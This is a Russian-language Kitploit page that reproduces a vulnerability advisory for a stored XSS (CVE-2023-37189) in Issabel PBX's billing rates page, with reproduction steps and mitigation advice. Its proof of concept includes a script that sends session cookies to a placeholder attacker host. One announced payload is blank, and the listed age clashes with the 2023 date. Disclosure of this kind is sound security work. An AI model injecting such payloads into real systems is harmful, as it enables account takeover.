Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-37189 — Уязвимость хранимого межсайтового скриптинга (XSS) существует в Issabel PBX версии 4.0.0-6 на странице управления тарифами (index.php?menu=billing_rates). | Kitploit
Инструменты/GitHubGitHub/sahiloj/cve-2023-37189
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеОбучение и Образование
GitHubsahiloj/cve-2023-37189

CVE-2023-37189

Уязвимость хранимого межсайтового скриптинга (XSS) существует в Issabel PBX версии 4.0.0-6 на странице управления тарифами (index.php?menu=billing_rates).

Репозиторий
116 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-37189 — Issabel PBX 4.0.0-6 Сохранённый межсайтовый скриптинг (XSS)

CVE Severity Type Vendor


Обзор

ПолеПодробности
CVE IDCVE-2023-37189
УязвимостьСохранённый межсайтовый скриптинг (XSS)
Затронутый продуктIssabel PBX 4.0.0-6
Затронутый URLindex.php?menu=billing_rates
Уязвимые поляПоля Name и Prefix в модуле Create New Rate
СерьёзностьСредняя (CVSS 3.1 Base Score: 6.1 — AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)
Дата сообщения7 июля 2023
ОбнаруженоSahil Ojha
Протестировано наWindows
Сайт разработчикаhttps://www.issabel.org/
Исходный кодhttps://github.com/IssabelFoundation/issabelPBX

Описание

Уязвимость Сохранённый межсайтовый скриптинг (XSS) существует в Issabel PBX версии 4.0.0-6 на странице управления тарифами (index.php?menu=billing_rates).

Issabel PBX — широко используемая открытая платформа унифицированных коммуникаций, построенная на базе FreePBX/Asterisk. Её функция Billing → Rates позволяет администраторам определять записи тарифов с указанием пользовательских Name и Prefix. Из-за недостаточной санитизации ввода и кодирования вывода аутентифицированный злоумышленник может внедрить произвольный HTML или JavaScript в любое из этих полей. Вредоносный скрипт постоянно сохраняется в базе данных приложения и автоматически выполняется в браузере любого пользователя, который впоследствии посещает страницу Rates — включая других администраторов — без какого-либо дополнительного взаимодействия.

Этот класс уязвимостей особенно опасен в панелях администратора, поскольку:

  • Его можно использовать для перехвата сеансовых cookie других администраторов, что приводит к полному захвату учётной записи.
  • Он позволяет проводить фишинговые атаки путём изменения внешнего вида страницы, отображаемой жертве.
  • Он может способствовать перехвату CSRF-токенов, кейлоггингу или перенаправлению на вредоносные сайты.
  • Вредоносная нагрузка сохраняется до явного удаления, что позволяет ей со временем воздействовать на неограниченное количество жертв.

Детали уязвимости

  • Класс уязвимости: Сохранённый (постоянный) межсайтовый скриптинг (CWE-79)
  • Вектор атаки: Сеть
  • Требуется аутентификация: Да (пользователь с низкими привилегиями или администратор)
  • Взаимодействие пользователя: Требуется (жертва должна посетить страницу Billing Rates)
  • Область: Изменена (злоумышленник может влиять на сеансы браузера других пользователей)
  • Коренная причина: Отсутствие HTML-кодирования / очистки вывода для полей Name и Prefix при отображении сохранённых значений на странице.

Доказательство концепции

Следующие нагрузки при вводе в поле Name или Prefix формы Create New Rate демонстрируют уязвимость:

Базовый alert (проверка работоспособности):

root@kitploit:~
<script>alert('XSS')</script>

Кража сеансовых cookie (замените attacker.example.com на сервер, которым вы владеете и имеете право пользоваться — никогда не атакуйте реальных пользователей или системы):

root@kitploit:~
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

Вредоносная нагрузка на основе onerror (обход WAF):

root@kitploit:~

⚠️ Примечание: Эти нагрузки предоставлены строго в образовательных целях и для исследований в области безопасности. Всегда получайте надлежащее письменное разрешение перед тестированием любой системы, которая вам не принадлежит.


Шаги для воспроизведения

  1. Войдите в веб-интерфейс Issabel PBX под учётной записью администратора.

  2. Перейдите в Reports → Billing → Rates (URL: index.php?menu=billing_rates).

  3. Нажмите «Create New Rate» и введите подготовленную XSS-нагрузку в поле Prefix или Name.

    Step 2 – Injecting the payload into the Name/Prefix fields

  4. Нажмите Save. Нагрузка теперь сохранена в базе данных.

  5. Любой пользователь (включая других администраторов), посещающий страницу Billing Rates, автоматически выполнит скрипт в своём браузере.

    Step 3 – Payload executes on page load

    Step 3 – Session cookie captured


Влияние

  • Перехват сеансов: Злоумышленники могут украсть сеансовые cookie и выдать себя за других пользователей или администраторов.
  • Повышение привилегий: Путем перехвата сеанса администратора злоумышленник с низкими привилегиями может получить полный административный контроль.
  • Утечка данных: Конфиденциальная информация, отображаемая на странице, может быть незаметно выгружена.
  • Постоянный бэкдор: Нагрузка остаётся активной до ручного удаления, что делает эту угрозу постоянной.

Смягчение / Устранение

Разработчику и системным администраторам рекомендуется применить следующие меры противодействия:

  1. Кодирование вывода: Применяйте контекстно-зависимое HTML-кодирование при отображении сохранённых значений на HTML-странице (например, используйте htmlspecialchars() в PHP с ENT_QUOTES). Это основная и наиболее надёжная защита от XSS.
  2. Проверка ввода: В качестве дополнительной меры защиты на серверной стороне отклоняйте или очищайте вводимые пользователем данные. Удаляйте или кодируйте специальные HTML-символы (<, >, ", ', &) перед сохранением. Имейте в виду, что проверку ввода можно обойти, поэтому она не должна быть единственным средством защиты.
  3. Политика безопасности контента (CSP): Разверните строгий HTTP-заголовок Content-Security-Policy, чтобы ограничить выполнение встроенных скриптов.
  4. Брандмауэр веб-приложений (WAF): Используйте WAF с правилами обнаружения XSS в качестве дополнительного уровня защиты.
  5. Регулярные аудиты безопасности: Проводите периодические проверки кода и тесты на проникновение всех полей ввода, контролируемых пользователем.

Ссылки

  • NVD – CVE-2023-37189
  • MITRE CVE – CVE-2023-37189
  • OWASP: Межсайтовый скриптинг (XSS)
  • CWE-79: Некорректная нейтрализация входных данных при генерации веб-страницы
  • Issabel PBX – Официальный сайт
  • IssabelFoundation/issabelPBX – GitHub

Отказ от ответственности

Этот репозиторий и содержащаяся в нём информация предоставлены только для образовательных целей и исследований в области безопасности. Автор не несёт ответственности за любое неправомерное использование или ущерб, вызванный предоставленной информацией. Всегда получайте явное письменное разрешение от владельца системы перед проведением любого тестирования безопасности.


Обнаружено и сообщено Sahil Ojha

Скачать инструмент